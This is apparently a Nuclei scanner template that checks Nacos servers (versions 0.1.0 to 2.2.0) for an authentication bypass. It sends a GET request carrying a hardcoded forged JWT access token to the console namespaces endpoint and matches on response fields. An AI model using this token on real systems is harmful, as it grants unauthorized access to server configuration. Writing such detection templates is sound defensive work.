id: nacos-permission-bypass-token

info:
  name: Nacos Permission bypass token
  author: thecyberneh
  severity: medium
  description: Nacos Permission bypass token in version -> 0.1.0 <= Nacos <= 2.2.0
  tags: logs

requests:
  - method: GET
    path:
      - "{{BaseURL}}/nacos/v1/console/namespaces?&accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3NTA4Mzg3N30.mIjNX6MXNF3FgQNTl-FduWpsaTSZrOQZxTCu7Tg46ZU&namespaceId=
"

    matchers-condition: and
    matchers:
      
      - type: word
        words:
          - "namespaceShowName"
        part: body

      - type: word
        words:
          - "configCount"
        part: body

      - type: status
        status:
          - 200